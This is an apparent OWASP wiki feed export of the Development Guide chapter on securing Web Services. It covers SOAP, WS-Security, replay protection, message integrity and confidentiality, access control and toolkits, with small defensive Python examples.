This is especially important since current versions of the .NET Web Service tools frequently do not cleanly handle the WS-Security and related XML schemas as published by OASIS, so some creativity on the part of a Web Service designer is needed. That said, the WSE package itself contains very rich and well-structured functionality, which can be utilized both with ASP.NET-based and standalone Web Service clients to check incoming SOAP messages and secure outgoing ones at the infrastructure level, relieving Web Service programmers of these details. Among other things, WSE 2.0 supports the most recent set of WS-Policy and WS-Security profiles, providing basic message security, plus WS-Trust with WS-SecureConversation. The latter are needed for establishing secure exchanges and sessions – similar to what SSL does at the transport level, but applied to message-based communication.&lt;br /&gt;
&lt;br /&gt;
===Java toolkits ===&lt;br /&gt;
&lt;br /&gt;
Most of the publicly available Java toolkits work at the level of XML security, i.e. XML-dsig and XML-enc – such as IBM’s XML Security Suite and Apache’s XML Security Java project. Java’s JSR 105 and JSR 106 (still not finalized) define Java bindings for signatures and encryption, which will allow plugging in implementations as JCA providers once work on those JSRs is completed. &lt;br /&gt;
&lt;br /&gt;
Moving one level up, to address Web Services themselves, the picture becomes muddier – at the moment, there are many implementations in various stages of incompleteness. For instance, Apache is currently working on the WSS4J project, which is moving rather slowly, and there is a commercial software package from Phaos (now owned by Oracle), which suffers from a lot of implementation problems.&lt;br /&gt;
&lt;br /&gt;
A popular choice among Web Service developers today is Sun’s JWSDP, which includes support for Web Service security. However, its support for the Web Service security specifications in version 1.5 is limited to an implementation of the core WSS standard with the username and X.509 certificate profiles. The security features are implemented as part of the JAX-RPC framework and are configuration-driven, which allows for clean separation from the Web Service’s implementation.&lt;br /&gt;
&lt;br /&gt;
===Hardware, software systems ===&lt;br /&gt;
&lt;br /&gt;
This category includes complete systems, rather than toolkits or frameworks. On the one hand, they usually provide rich functionality right off the shelf; on the other hand, their usage model is rigidly constrained by the solution’s architecture and implementation. This is in contrast to the toolkits, which do not provide any services by themselves, but hand system developers the necessary tools to include the desired Web Service security features in their products… or to shoot themselves in the foot by applying them inappropriately.&lt;br /&gt;
&lt;br /&gt;
These systems can be used at the infrastructure layer to verify incoming messages against the effective policy, checking signatures, tokens, etc., before passing them on to the target Web Service. When applied to outgoing SOAP messages, they act as a proxy, altering the messages to decorate them with the required security elements and to sign and/or encrypt them.&lt;br /&gt;
&lt;br /&gt;
Software systems are characterized by significant configuration flexibility, but comparatively slow processing. On the bright side, they often provide a high level of integration with the existing enterprise infrastructure, relying on back-end user and policy stores to look at the credentials extracted from the WSS header from a broader perspective. An example of such a system is TransactionMinder from the former Netegrity – a Policy Enforcement Point for the Web Services behind it, layered on top of the Policy Server, which makes policy decisions by checking the extracted credentials against the configured stores and policies.&lt;br /&gt;
&lt;br /&gt;
For hardware systems, performance is the key – they have already broken the gigabyte processing threshold, and allow for real-time processing of huge documents, decorated according to a variety of the latest Web Service security standards, not only WSS. Usage simplicity is another attractive point of these systems – in the most trivial cases, the hardware box may literally be dropped in, plugged in, and used right away. These qualities come with a price, however – the performance and simplicity can be achieved only as long as the user stays within the pre-configured confines of the hardware box. The moment he tries to integrate with the back-end stores via callbacks (for those solutions that have this capability, since not all of them do), most of the advantages are lost. As an example of such a hardware device, Layer 7 Technologies provides the scalable SecureSpan Networking Gateway, which acts both as an inbound firewall and an outbound proxy to handle XML traffic in real time.&lt;br /&gt;
&lt;br /&gt;
==Problems ==&lt;br /&gt;
&lt;br /&gt;
As is probably clear from the previous sections, Web Services are still experiencing a lot of turbulence, and it will take a while before they really catch on. Here is a brief look at the problems surrounding the currently existing security standards and their implementations.&lt;br /&gt;
&lt;br /&gt;
===Immaturity of the standards ===&lt;br /&gt;
&lt;br /&gt;
Most of the standards are either very recent (a couple of years old at most) or still being developed. Although standards development is done in committees, which presumably reduces risks by going through an exhaustive reviewing and commenting process, some error scenarios still slip in periodically, as no amount of theory can match the testing that results from thousands of developers pounding on the standards in the field. &lt;br /&gt;
&lt;br /&gt;
Additionally, it does not help that for political reasons some of these standards are withheld from public process, which is the case with many standards from the WSA arena (see 0), or that some of the efforts are duplicated, as was the case with LA and WS-Federation specifications.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Performance ===&lt;br /&gt;
&lt;br /&gt;
XML parsing is a slow task – an accepted reality – and SOAP processing slows it down even more. Now, with expensive cryptographic and textual conversion operations thrown into the mix, these tasks become a performance bottleneck, even with the latest crypto- and XML-processing hardware solutions offered today. All of the products currently on the market face this issue, and they are trying to resolve it with varying degrees of success. &lt;br /&gt;
&lt;br /&gt;
Hardware solutions, while substantially (by orders of magnitude) improving the performance, cannot always be used as an optimal solution, as they cannot be easily integrated with the already existing back-end software infrastructure, at least not without making performance sacrifices. Another consideration in deciding whether hardware-based systems are the right solution is that they are usually highly specialized in what they do, while modern Application Servers and security frameworks can usually offer a much greater variety of protection mechanisms, protecting not only Web Services, but also other deployed applications in a uniform and consistent way.&lt;br /&gt;
&lt;br /&gt;
===Complexity and interoperability ===&lt;br /&gt;
&lt;br /&gt;
As could be deduced from the previous sections, the Web Service security standards are fairly complex and have a very steep learning curve associated with them. Most of the current products dealing with Web Service security suffer from very mediocre usability due to the complexity of the underlying infrastructure. Configuring all the different policies, identities, keys, and protocols takes a lot of time and a good understanding of the technologies involved, especially since, most of the time, the errors that end users see have very cryptic and misleading descriptions. &lt;br /&gt;
&lt;br /&gt;
In order to help administrators and reduce security risks from service misconfigurations, many companies develop policy templates, which group together best practices for protecting incoming and outgoing SOAP messages. Unfortunately, this work is not currently on the radar of any of the standards bodies, so it appears unlikely that such templates will be released for public use any time soon. Closest to this effort may be WS-I’s Basic Security Profile (BSP), which tries to define the rules for better interoperability among Web Services, using a subset of common security features from various security standards like WSS. However, this work is not aimed at supplying administrators with ready-for-deployment security templates matching the most popular business use cases, but rather at establishing the least common denominator.&lt;br /&gt;
&lt;br /&gt;
===Key management ===&lt;br /&gt;
&lt;br /&gt;
Key management usually lies at the foundation of any other security activity, as most protection mechanisms rely on cryptographic keys one way or another. While Web Services have the XKMS protocol for key distribution, local key management still presents a huge challenge in most cases, since the PKI mechanism has a lot of well-documented deployment and usability issues. Systems that opt for homegrown key management mechanisms run significant risks in many cases, since the questions of storing, updating, and recovering secret and private keys are more often than not inadequately addressed in such solutions.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* SearchSOA, SOA needs practical operational governance, Toufic Boubez&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://searchsoa.techtarget.com/news/interview/0,289202,sid26_gci1288649,00.html?track=NL-110&amp;amp;ad=618937&amp;amp;asrc=EM_NLN_2827289&amp;amp;uid=4724698&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Whitepaper: Securing XML Web Services: XML Firewalls and XML VPNs&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://layer7tech.com/new/library/custompage.html?id=4&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* eBizQ, The Challenges of SOA Security, Peter Schooff&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ebizq.net/blogs/news_security/2008/01/the_complexity_of_soa_security.php&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Piliptchouk, D., WS-Security in the Enterprise, O’Reilly ONJava&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/02/09/wssecurity.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/03/30/wssecurity2.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* WS-Security OASIS site&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=wss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Microsoft, ''What’s new with WSE 3.0''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/webservices/webservices/building/wse/default.aspx?pull=/library/en-us/dnwse/html/newwse3.asp&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Eoin Keary, Preventing DOS attacks on web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;https://www.threatsandcountermeasures.com/wiki/default.aspx/ThreatsAndCountermeasuresCommunityKB.PreventingDOSAttacksOnWebServices&amp;lt;/u&amp;gt;&lt;br /&gt;
[[category:FIXME | broken link]]&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Web Services]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59465</id>
		<title>Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59465"/>
				<updated>2009-04-26T11:37:58Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Standards committees */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
[[Category:FIXME|This article has a lot of what I think are placeholders for references. It says &amp;quot;see section 0&amp;quot; and I think those are intended to be replaced with actual sections. I have noted them where I have found them. Need to figure out what those intended to reference, and change the reference]]&lt;br /&gt;
This section of the Development Guide details the common issues facing Web Services developers, and methods to address them. Due to space limitations, it cannot look at all of the surrounding issues in great detail, since each of them deserves a separate book of its own. Instead, an attempt is made to steer the reader to the appropriate usage patterns, and to warn about potential roadblocks on the way.&lt;br /&gt;
&lt;br /&gt;
Web Services have received a lot of press, and with that comes a great deal of confusion over what they really are. Some herald Web Services as the biggest technology breakthrough since the web itself; others are more skeptical, seeing them as nothing more than evolved web applications. In either case, the issues of web application security apply to web services just as they do to web applications. &lt;br /&gt;
&lt;br /&gt;
==What are Web Services?==&lt;br /&gt;
&lt;br /&gt;
Suppose you were making an application that you wanted other applications to be able to communicate with.  For example, your Java application has stock information updated every 5 minutes, and you would like other applications, ones that may not even exist yet, to be able to use the data.&lt;br /&gt;
&lt;br /&gt;
One way you can do this is to serialize your Java objects and send them over the wire to the application that requests them.  The problem with this approach is that a C# application would not be able to use these objects, since C# serializes and deserializes objects differently than Java.  &lt;br /&gt;
&lt;br /&gt;
Another approach you could take is to send a text file filled with data to the application that requests it.  This is better because a C# application could read the data, but it has another flaw: let's assume your stock application is not the only one the C# application needs to interact with.  Maybe it also needs weather data, local restaurant data, movie data, etc.  If every one of these applications uses its own unique file format, it would take considerable effort to get the C# application to a working state.  &lt;br /&gt;
&lt;br /&gt;
The solution to both of these problems is to send data in a standard format, one that any application can use regardless of the data being transported.  Web Services are this solution.  They let any application communicate with any other application without having to consider the language it was developed in or the format of the data.  &lt;br /&gt;
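The idea above can be sketched in a few lines: the producer emits plain XML, and any consumer, in any language, can parse it back without sharing serialization code. This is only an illustrative sketch; the element names ("quotes", "quote", "symbol") are invented here and are not part of any standard.

```python
# Hypothetical sketch: publishing stock data as language-neutral XML.
import xml.etree.ElementTree as ET

def to_xml(quotes):
    # Serialize a {symbol: price} mapping into a small XML document.
    root = ET.Element("quotes")
    for symbol, price in quotes.items():
        q = ET.SubElement(root, "quote", symbol=symbol)
        q.text = str(price)
    return ET.tostring(root, encoding="unicode")

def from_xml(document):
    # Any consumer can recover the data by parsing the standard format.
    root = ET.fromstring(document)
    return {q.get("symbol"): float(q.text) for q in root.iter("quote")}

doc = to_xml({"ACME": 12.5})
assert from_xml(doc) == {"ACME": 12.5}
```

A C# or Java consumer would implement only the `from_xml` half against the same document structure, which is the whole point of a shared format.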
&lt;br /&gt;
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation tier level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model. Web services typically present a public functional interface, callable in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases. &lt;br /&gt;
&lt;br /&gt;
==Securing Web Services ==&lt;br /&gt;
&lt;br /&gt;
Web services, like other distributed applications, require protection at multiple levels:&lt;br /&gt;
&lt;br /&gt;
* SOAP messages that are sent on the wire should be delivered confidentially and without tampering&lt;br /&gt;
&lt;br /&gt;
* The server needs to be confident who it is talking to and what the clients are entitled to&lt;br /&gt;
&lt;br /&gt;
* The clients need to know that they are talking to the right server, and not a phishing site (see the Phishing chapter for more information)&lt;br /&gt;
&lt;br /&gt;
* System message logs should contain sufficient information to reliably reconstruct the chain of events and track those back to the authenticated callers&lt;br /&gt;
&lt;br /&gt;
Correspondingly, the high-level approaches to solutions, discussed in the following sections, are valid for pretty much any distributed application, with some variations in the implementation details.&lt;br /&gt;
&lt;br /&gt;
The good news for Web Services developers is that these are infrastructure-level tasks, so, theoretically, it is only the system administrators who should be worrying about these issues. However, for a number of reasons discussed later in this chapter, WS developers usually have to be at least aware of all these risks, and oftentimes they still have to resort to manually coding or tweaking the protection components.&lt;br /&gt;
&lt;br /&gt;
==Communication security ==&lt;br /&gt;
&lt;br /&gt;
There is a commonly cited statement, and an even more often implemented approach: “we are using SSL to protect all communication, so we are secure”. At the same time, there have been so many articles published on the topic of “channel security vs. token security” that it hardly makes sense to repeat those arguments here. Therefore, listed below is just a brief rundown of the most common pitfalls of using channel security alone:&lt;br /&gt;
&lt;br /&gt;
* It provides only “point-to-point” security&lt;br /&gt;
&lt;br /&gt;
Any communication with multiple “hops” requires establishing separate channels (and trusts) between each communicating node along the way. There is also a subtle issue of trust transitivity, as trusts between node pairs {A,B} and {B,C} do not automatically imply an {A,C} trust relationship.&lt;br /&gt;
&lt;br /&gt;
* Storage issue&lt;br /&gt;
&lt;br /&gt;
After messages are received on the server (even if it is not the intended recipient), they exist in clear-text form, at least temporarily. Storing the transmitted information at the intermediate or destination servers, in log files (where it can be browsed by anybody) and local caches, aggravates the problem.&lt;br /&gt;
&lt;br /&gt;
* Lack of interoperability&lt;br /&gt;
&lt;br /&gt;
While SSL provides a standard mechanism for transport protection, applications then have to utilize highly proprietary mechanisms for transmitting credentials, ensuring freshness, integrity, and confidentiality of data sent over the secure channel. Using a different server, which is semantically equivalent, but accepts a different format of the same credentials, would require altering the client and prevent forming automatic B2B service chains. &lt;br /&gt;
&lt;br /&gt;
Standards-based token protection in many cases provides a superior alternative for message-oriented Web Service SOAP communication model.&lt;br /&gt;
&lt;br /&gt;
That said, the reality is that most Web Services today are still protected by some form of channel security mechanism, which alone might suffice for a simple internal application. However, one should clearly realize the limitations of such an approach, and make a conscious trade-off at design time as to whether channel, token, or combined protection would work better for each specific case.&lt;br /&gt;
&lt;br /&gt;
==Passing credentials ==&lt;br /&gt;
&lt;br /&gt;
In order to enable credentials exchange and authentication for Web Services, their developers must address the following issues.&lt;br /&gt;
&lt;br /&gt;
First, since SOAP messages are XML-based, all passed credentials have to be converted to text format. This is not a problem for username/password types of credentials, but binary ones (like X.509 certificates or Kerberos tokens) require converting them into text prior to sending and unambiguously restoring them upon receiving, which is usually done via a procedure called Base64 encoding and decoding.&lt;br /&gt;
&lt;br /&gt;
Second, passing credentials carries an inherent risk of their disclosure, either by sniffing them during the wire transmission, or by analyzing the server logs. Therefore, things like passwords and private keys need to be either encrypted or simply never sent “in the clear”. The usual ways to avoid sending sensitive credentials are cryptographic hashing and/or signatures.&lt;br /&gt;
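As an illustration of the hashing approach, the WS-Security Username Token Profile defines a password digest of the form Base64(SHA-1(nonce + created + password)), so that the clear-text password never travels on the wire. The sketch below assumes that shape; the helper name and sample values are invented for illustration.

```python
# Sketch of a WSS-style password digest (assumed shape, not a full
# UsernameToken implementation): Base64( SHA-1( nonce + created + password ) )
import base64, datetime, hashlib, os

def password_digest(password, nonce, created):
    raw = nonce + created.encode("utf-8") + password.encode("utf-8")
    return base64.b64encode(hashlib.sha1(raw).digest()).decode("ascii")

nonce = os.urandom(16)                                   # fresh per message
created = datetime.datetime.now(datetime.timezone.utc).isoformat()
digest = password_digest("s3cret", nonce, created)

# The server, which knows the password, recomputes and compares:
assert digest == password_digest("s3cret", nonce, created)
assert digest != password_digest("wrong password", nonce, created)
```

Because the nonce and creation time enter the hash, an eavesdropped digest is useless for a later request, which also helps against the replay attacks discussed below.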
&lt;br /&gt;
==Ensuring message freshness ==&lt;br /&gt;
&lt;br /&gt;
Even a valid message may present a danger if it is utilized in a “replay attack” – i.e., it is sent multiple times to the server to make it repeat the requested operation. This may be achieved by capturing an entire message, even if it is sufficiently protected against tampering, since it is the message itself that is used for the attack (see the XML Injection section of the Interpreter Injection chapter).&lt;br /&gt;
&lt;br /&gt;
The usual means of protecting against replayed messages are either using unique identifiers (nonces) on messages and keeping track of processed ones, or using a relatively short validity time window. In the Web Services world, information about the message creation time is usually communicated by inserting timestamps, which may just tell the instant the message was created, or carry additional information, like its expiration time or certain conditions.&lt;br /&gt;
&lt;br /&gt;
The latter solution, although easier to implement, requires clock synchronization and is sensitive to “server time skew”, where the server's or clients' clocks drift too much and prevent timely message delivery, although this usually does not present significant problems with modern-day computers. A greater issue lies with message queuing at the servers, where messages may expire while waiting to be processed in the queue of an especially busy or non-responsive server.&lt;br /&gt;
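A minimal sketch of the two defences just described, a nonce cache plus a freshness window, might look as follows; all names here are illustrative, not taken from any WS-* specification.

```python
# Toy replay protection: reject stale timestamps and repeated nonces.
import time

MAX_AGE_SECONDS = 300        # validity window for a message timestamp
seen_nonces = set()          # in production: a bounded, expiring cache

def accept_message(nonce, created, now=None):
    now = time.time() if now is None else now
    if now - created > MAX_AGE_SECONDS:
        return False         # too old: expired or replayed later
    if nonce in seen_nonces:
        return False         # exact replay of a still-fresh message
    seen_nonces.add(nonce)
    return True

t = time.time()
assert accept_message("abc", t, now=t)             # first delivery accepted
assert not accept_message("abc", t, now=t)         # replay rejected
assert not accept_message("def", t - 600, now=t)   # stale message rejected
```

The window keeps the nonce cache small: anything older than the window can be rejected on the timestamp alone, so nonces need to be remembered only for the window's duration.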
&lt;br /&gt;
==Protecting message integrity ==&lt;br /&gt;
&lt;br /&gt;
When a message is received, a web service must always ask two questions: “do I trust the caller?” and “did the caller actually create this message?” Assuming that the caller's trust has been established one way or another, the server has to be assured that the message it is looking at was indeed issued by the caller, and not altered along the way (intentionally or not). Tampering may affect technical qualities of a SOAP message, such as the message’s timestamp, or its business content, such as the amount to be withdrawn from a bank account. Obviously, neither change should go undetected by the server.&lt;br /&gt;
&lt;br /&gt;
In communication protocols, there are usually mechanisms, like checksums, applied to ensure a packet’s integrity. This would not be sufficient, however, in the realm of publicly exposed Web Services, since checksums (or digests, their cryptographic equivalents) are easily replaceable and cannot be reliably traced back to the issuer. The required association may be established by utilizing an HMAC, or by combining message digests with either cryptographic signatures or secret-key encryption (assuming the keys are known only to the two communicating parties), so that any change will immediately result in a cryptographic error.&lt;br /&gt;
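The HMAC approach mentioned above can be demonstrated with Python's standard library: anyone can recompute a plain digest over an altered message, but only a holder of the shared secret can produce a matching HMAC. The key and message bodies are illustrative values.

```python
# HMAC ties the digest to a shared secret, so it cannot be replaced
# by an attacker who alters the message in transit.
import hashlib, hmac

key = b"shared-secret-key"                      # known only to both parties
message = b"<withdraw amount='100'/>"

tag = hmac.new(key, message, hashlib.sha256).hexdigest()

# Tampering with the message invalidates the tag...
tampered = b"<withdraw amount='9999'/>"
assert not hmac.compare_digest(
    tag, hmac.new(key, tampered, hashlib.sha256).hexdigest())
# ...while the legitimate message still verifies.
assert hmac.compare_digest(
    tag, hmac.new(key, message, hashlib.sha256).hexdigest())
```

Note the use of `hmac.compare_digest` rather than `==`, a constant-time comparison that avoids leaking how many leading characters of a guessed tag were correct.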
&lt;br /&gt;
==Protecting message confidentiality ==&lt;br /&gt;
&lt;br /&gt;
Oftentimes, ensuring integrity is not sufficient – in many cases it is also desirable that nobody can see the data that is passed around and/or stored locally. This may apply to the entire message being processed, or only to certain parts of it – in either case, some type of encryption is required to conceal the content. Normally, symmetric encryption algorithms are used to encrypt bulk data, since they are significantly faster than asymmetric ones. Asymmetric encryption is then applied to protect the symmetric session keys, which, in many implementations, are valid for one communication only and are subsequently discarded.&lt;br /&gt;
&lt;br /&gt;
Applying encryption requires extensive setup work, since the communicating parties now have to be aware of which keys they can trust, deal with certificate and key validation, and know which keys should be used for which communication.&lt;br /&gt;
&lt;br /&gt;
In many cases, encryption is combined with signatures to provide both integrity and confidentiality. Normally, signing keys are different from the encrypting ones, primarily because of their different lifecycles – signing keys are permanently associated with their owners, while encryption keys may be invalidated after the message exchange. Another reason may be separation of business responsibilities - the signing authority (and the corresponding key) may belong to one department or person, while encryption keys are generated by the server controlled by members of IT department. &lt;br /&gt;
&lt;br /&gt;
==Access control ==&lt;br /&gt;
&lt;br /&gt;
After the message has been received and successfully validated, the server must decide:&lt;br /&gt;
&lt;br /&gt;
* Does it know who is requesting the operation (Identification)&lt;br /&gt;
&lt;br /&gt;
* Does it trust the caller’s identity claim (Authentication)&lt;br /&gt;
&lt;br /&gt;
* Does it allow the caller to perform this operation (Authorization)&lt;br /&gt;
&lt;br /&gt;
There is not much WS-specific activity that takes place at this stage – just several new ways of passing the credentials for authentication. Most often, authorization (or entitlement) tasks occur completely outside of the Web Service implementation, at the Policy Server that protects the whole domain.&lt;br /&gt;
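The three decisions listed above can be illustrated with a toy entitlement check; the policy table, caller names, and operation names below are invented for illustration and are not specific to any Policy Server product.

```python
# Toy access control: identification (is the caller known?) and
# authorization (is the caller entitled to the operation?).
# Authentication is assumed to have happened earlier, e.g. via
# token or signature validation on the incoming message.
entitlements = {
    "alice": {"getQuote", "placeOrder"},
    "bob":   {"getQuote"},
}

def authorize(caller, operation):
    if caller not in entitlements:                 # identification failed
        return False
    return operation in entitlements[caller]       # authorization decision

assert authorize("alice", "placeOrder")
assert not authorize("bob", "placeOrder")          # known, but not entitled
assert not authorize("mallory", "getQuote")        # unknown caller
```

In a real deployment this table would live in the domain's Policy Server, outside the Web Service implementation, exactly as the text above describes.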
&lt;br /&gt;
There is another significant problem here: traditional HTTP firewalls do not help stop attacks on Web Services. An organization would need an XML/SOAP firewall, which is capable of conducting application-level analysis of the web server’s traffic and making intelligent decisions about passing SOAP messages to their destination. The reader will need to refer to other books and publications on this very important topic, as it is impossible to cover it within just one chapter.&lt;br /&gt;
&lt;br /&gt;
==Audit ==&lt;br /&gt;
&lt;br /&gt;
A common task, typically required by audits, is reconstructing the chain of events that led to a certain problem. Normally, this is achieved by saving server logs in a secure location, available only to the IT administrators and system auditors, in order to create what is commonly referred to as an “audit trail”. Web Services are no exception to this practice, and follow the general approach of other types of Web Applications.&lt;br /&gt;
&lt;br /&gt;
Another auditing goal is non-repudiation, meaning that a message can be verifiably traced back to the caller. Following the standard legal practice, electronic documents now require some form of an “electronic signature”, but its definition is extremely broad and can mean practically anything – in many cases, entering your name and birthday qualifies as an e-signature.&lt;br /&gt;
&lt;br /&gt;
As far as Web Services are concerned, such a level of protection would be insufficient and easily forgeable. The standard practice is to require cryptographic digital signatures over any content that has to be legally binding – if a document with such a signature is saved in the audit log, it can be reliably traced to the owner of the signing key. &lt;br /&gt;
&lt;br /&gt;
==Web Services Security Hierarchy ==&lt;br /&gt;
&lt;br /&gt;
Technically speaking, Web Services themselves are very simple and versatile: XML-based communication, described by an XML-based grammar called the Web Services Description Language (WSDL, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2005/WD-wsdl20-20050510&amp;lt;/u&amp;gt;), which binds abstract service interfaces, consisting of messages (expressed as XML Schema) and operations, to the underlying wire format. Although it is by no means a requirement, the format of choice is currently SOAP over HTTP. This means that Web Service interfaces are described in terms of the incoming and outgoing SOAP messages, transmitted over the HTTP protocol.&lt;br /&gt;
&lt;br /&gt;
===Standards committees ===&lt;br /&gt;
&lt;br /&gt;
Before reviewing the individual standards, it is worth taking a brief look at the organizations which are developing and promoting them. There are quite a few industry-wide groups and consortiums working in this area, most important of which are listed below. &lt;br /&gt;
&lt;br /&gt;
W3C (see &amp;lt;u&amp;gt;http://www.w3.org&amp;lt;/u&amp;gt;) is the most well known industry group, which owns many Web-related standards and develops them in Working Group format. Of particular interest to this chapter are XML Schema, SOAP, XML-dsig, XML-enc, and WSDL standards (called recommendations in the W3C’s jargon).&lt;br /&gt;
&lt;br /&gt;
OASIS (see &amp;lt;u&amp;gt;http://www.oasis-open.org&amp;lt;/u&amp;gt;) mostly deals with Web Service-specific standards, not necessarily security-related. It also operates on a committee basis, forming so-called Technical Committees (TC) for the standards that it is going to be developing. Of interest for this discussion, OASIS owns WS-Security and SAML standards. &lt;br /&gt;
&lt;br /&gt;
Web Services Interoperability Organization (WS-I, see &amp;lt;u&amp;gt;http://www.ws-i.org/&amp;lt;/u&amp;gt;) was formed to promote a general framework for interoperable Web Services. Mostly its work consists of taking other broadly accepted standards, and developing so-called profiles, or sets of requirements for conforming Web Service implementations. In particular, its Basic Security Profile (BSP) relies on the OASIS’ WS-Security standard and specifies sets of optional and required security features in Web Services that claim interoperability.&lt;br /&gt;
&lt;br /&gt;
The Liberty Alliance (LA, see &amp;lt;u&amp;gt;http://projectliberty.org&amp;lt;/u&amp;gt;) consortium was formed to develop and promote an interoperable Identity Federation framework. Although this framework is general rather than strictly Web Service-specific, it is important for this topic because of its close relation to the SAML standard developed by OASIS. &lt;br /&gt;
&lt;br /&gt;
Besides the previously listed organizations, there are other industry associations, both permanently established and short-lived, which push forward various Web Service security activities. They are usually made up of software industry’s leading companies, such as Microsoft, IBM, Verisign, BEA, Sun, and others, that join them to work on a particular issue or proposal. Results of these joint activities, once they reach certain maturity, are often submitted to standardizations committees as a basis for new industry standards.&lt;br /&gt;
&lt;br /&gt;
==SOAP ==&lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2003/REC-soap12-part1-20030624/&amp;lt;/u&amp;gt;) provides an XML-based framework for exchanging structured and typed information between peer services. This information, formatted into a Header and a Body, can theoretically be transmitted over a number of transport protocols, but only the HTTP binding has been formally defined and is in active use today. SOAP provides for Remote Procedure Call-style (RPC) interactions, similar to remote function calls, and for Document-style communication, with message contents based exclusively on the XML Schema definitions in the Web Service’s WSDL. Invocation results may optionally be returned in the response message, or a Fault may be raised, which is roughly equivalent to using exceptions in traditional programming languages.&lt;br /&gt;
&lt;br /&gt;
SOAP protocol, while defining the communication framework, provides no help in terms of securing message exchanges – the communications must either happen over secure channels, or use protection mechanisms described later in this chapter. &lt;br /&gt;
&lt;br /&gt;
===XML security specifications (XML-dsig &amp;amp; Encryption) ===&lt;br /&gt;
&lt;br /&gt;
XML Signature (XML-dsig, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmldsig-core-20020212/&amp;lt;/u&amp;gt;), and XML Encryption (XML-enc, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/&amp;lt;/u&amp;gt;) add cryptographic protection to plain XML documents. These specifications add integrity, message and signer authentication, as well as support for encryption/decryption of whole XML documents or only of some elements inside them. &lt;br /&gt;
&lt;br /&gt;
The real value of those standards comes from the highly flexible framework developed to reference the data being processed (both internal and external relative to the XML document), refer to the secret keys and key pairs, and to represent results of signing/encrypting operations as XML, which is added to/substituted in the original document.&lt;br /&gt;
&lt;br /&gt;
However, by themselves, XML-dsig and XML-enc do not solve the problem of securing SOAP-based Web Service interactions, since the client and service first have to agree on the order of those operations, where to look for the signature, how to retrieve cryptographic tokens, which message elements should be signed and encrypted, how long a message is considered to be valid, and so on. These issues are addressed by the higher-level specifications, reviewed in the following sections.&lt;br /&gt;
&lt;br /&gt;
===Security specifications ===&lt;br /&gt;
&lt;br /&gt;
In addition to the above standards, there is a broad set of security-related specifications being currently developed for various aspects of Web Service operations. &lt;br /&gt;
&lt;br /&gt;
One of them is SAML, which defines how identity, attribute, and authorization assertions should be exchanged among participating services in a secure and interoperable way. &lt;br /&gt;
&lt;br /&gt;
A broad consortium, headed by Microsoft and IBM, with input from Verisign, RSA Security, and other participants, developed a family of specifications collectively known as the “Web Services Roadmap”. Its foundation, WS-Security, was submitted to OASIS and became an OASIS standard in 2004. Other important specifications from this family are still in different development stages, and plans for their submission have not yet been announced, although they cover such important issues as security policies (WS-Policy et al.), trust and security token exchange (WS-Trust), and establishing context for secure conversation (WS-SecureConversation). One of the specifications in this family, WS-Federation, directly competes with the work being done by the LA consortium, and, although it is supposed to be incorporated into the Longhorn release of Windows, its future is not clear at the moment, since it has been significantly delayed and presently does not have industry momentum behind it.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Standard ==&lt;br /&gt;
&lt;br /&gt;
The WS-Security specification (WSS) was originally developed by Microsoft, IBM, and Verisign as part of a “Roadmap”, which was later renamed the Web Services Architecture, or WSA. WSS served as the foundation for all other specifications in this domain, creating a basic infrastructure for developing message-based security exchange. Because of its importance for establishing interoperable Web Services, it was submitted to OASIS and, after undergoing the required committee process, became an officially accepted standard. The current version is 1.0, and work on version 1.1 of the specification is under way, expected to finish in the second half of 2005.&lt;br /&gt;
[[category:FIXME | outdated info? is it complete now?]]&lt;br /&gt;
&lt;br /&gt;
===Organization of the standard ===&lt;br /&gt;
&lt;br /&gt;
The WSS standard itself deals with several core security areas, leaving many details to so-called profile documents. The core areas, broadly defined by the standard, are: &lt;br /&gt;
&lt;br /&gt;
* Ways to add security headers (WSSE Header) to SOAP Envelopes&lt;br /&gt;
&lt;br /&gt;
* Attachment of security tokens and credentials to the message &lt;br /&gt;
&lt;br /&gt;
* Inserting a timestamp&lt;br /&gt;
